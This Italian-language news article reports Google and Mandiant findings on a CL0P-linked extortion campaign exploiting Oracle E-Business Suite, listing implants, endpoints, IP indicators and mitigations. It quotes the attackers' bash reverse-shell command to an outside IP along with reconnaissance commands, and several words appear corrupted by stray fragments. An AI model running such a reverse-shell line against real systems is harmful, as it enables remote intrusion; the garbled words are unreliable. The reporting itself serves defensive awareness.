Google denuncia lo sfruttamento di "grandi quantità di dati dei clienti" in una campagna di estorsione

Google ha segnalatotracsu larga scala di dati dei clienti da parte di malintenzionati, che secondo l'azienda sarebbero coinvolti in un sistema di estorsione. Google Threat Intelligence e Mandiant tracrintracciato l'operazione di sfruttamento fino ad arrivare ad aggressori che potrebbero essere associati al gruppo estorsivo CL0P.

Il Threat Intelligence Group (GTIG) di Google e Mandiant hanno portato alla luce una vasta campagna di estorsione che sfrutta le vulnerabilità dell'E-Business Suite (EBS) di Oracle. La campagna di estorsione ha portato al furto di ingenti volumi di dati dei clienti. Hanno affermato che l'operazione è iniziata il 29 settembre 2025 e ha coinvolto un gruppo che rivendica legami con il marchio di estorsione CL0P.

Google e Mandiant svelano lo sfruttamento zero-day 

Secondo il rapporto di Google, gli aggressori hanno inviato un "elevato volume" di email a dirigenti di diverse organizzazioni, denunciando violazioni dei loro ambienti Oracle EBS e minacciando di pubblicare i dati rubati se non fosse stato pagato un riscatto. 

Le email, inviate da centinaia di account di terze parti compromessi, includevano indirizzi di contatto [email protected] e [email protected], precedentemente collegati al sito di fuga di dati CL0P.

L'indagine congiunta di Google e Mandiant ha scoperto che l'attività di sfruttamento risale addirittura a luglio 2025, probabilmente collegata a una vulnerabilità zero-day ora traccome CVE-2025-61882. In alcuni casi, gli aggressori avrebbero esfiltrato "una quantità significativa di dati" dalle organizzazioni interessate.

Oracle ha dichiarato che le falle sfruttate erano state risolte a luglio, ma ha successivamente rilasciato aggiornamenti di emergenza il 4 ottobre per risolvere ulteriori vulnerabilità. Oracle ha invitato i propri clienti a utilizzare gli ultimi aggiornamenti critici delle patch e ha sottolineato che rimanere aggiornati su tutte le patch è essenziale per prevenire compromissioni.

Il marchio di estorsione CL0P è attivo dal 2020 ed è storicamente legato al gruppo criminale informatico FIN11. In precedenza, aveva preso di mira sistemi di trasferimento file gestito come MOVEit, GoAnywhere e Accellion FTA. Queste campagne hanno seguito uno schema simile: sfruttamento di massa di vulnerabilità zero-day, furto di dati sensibili ed estorsione a distanza di settimane. 

Al momento della stesura del rapportonon erano ancora comparse nuove vittime di questo incidentedent sul sito di CL0P dedicato alla fuga di dati 

Impianti Java complessi e multistadio

da Google e Mandiant rivela che gli aggressori hanno utilizzato diverse catene di exploit mirate ai componenti di Oracle EBS, tra cui UiServlet e SyncServlet, per ottenere l'esecuzione di codice in remoto e installare malware Java a più stadi.

Nel luglio 2025 si è verificata un'attività sospetta che coinvolgeva richieste HTTP a /OA_HTML/configurator/UiServlet. Questa attività sospetta è stata osservata in un altro exploit emerso in seguito in un gruppo Telegram denominato "SCATTERED LAPSUS$ HUNTERS" 

L'exploit trapelato sfruttava diverse tecniche avanzate per ottenere il controllo sui server presi di mira, come una falsificazione della richiesta lato server (SSRF), un bypass dell'autenticazione e un'iniezione di template XSL.

Nell'agosto 2025, gli aggressori iniziarono a utilizzare un altro strumento chiamato SyncServlet per creare ed eseguire template dannosi all'interno del database EBS. Questi template contenevano payload XSL codificati in Base64 che caricavano malware basato su Java direttamente in memoria. 

Tra gli impiantidentc'erano GOLDVEIN.JAVA, un downloader che recuperava i payload di seconda fase dai server di comando controllati dagli aggressori, e una catena multistrato denominata SAGE, che installava filtri servlet Java persistenti per ulteriori sfruttamenti.

Dopo aver violato il sistema, gli aggressori hanno utilizzato l'account EBS "applmgr" per esplorare il sistema, raccogliere dettagli di rete e di sistema e quindi installare altri file dannosi. Gli aggressori hanno anche utilizzato comandi shell come ip addr, netstat -an e bash -i >& /dev/tcp/200.107.207.26/53 0>&1.

Gli indirizzi IP 200.107.207.26 e 161.97.99.49 sono statidentnei tentativi di sfruttamento, mentre 162.55.17.215:443 e 104.194.11.200:443 sono stati elencati come server di comando e controllo per il payload GOLDVEIN.JAVA.

GTIG non ha formalmente collegato l'operazione a nessun gruppo noto, ma la campagna presenta delle somiglianze con FIN11, un gruppo di criminalità informatica motivato da interessi finanziari, precedentemente associato al ransomware CL0P e a operazioni di furto di dati su larga scala. 

Mandiant ha anche osservato che uno degli account compromessi utilizzati per inviare le email estorsive era stato utilizzato in precedenti attacchi correlati a FIN11.

Si invitano gli utenti a diffidare delle tabelle del database EBS XDO_TEMPLATES_B e XDO_LOBS, in particolare quelle con nomi che iniziano con "TMP" o "DEF", e a bloccare il traffico Internet esterno dai server EBS per impedire ulteriori estorsioni di dati.

Le organizzazioni raccomandano inoltre di monitorare attentamente le richieste HTTP agli endpoint come /OA_HTML/SyncServlet e /OA_HTML/configurator/UiServlet e di analizzare i dump di memoria per individuare prove di payload Java in memoria.

Google ha avvertito che i gruppi legati a CL0P continueranno quasi certamente a dedicare le proprie risorse all'acquisizione di exploit zero-day.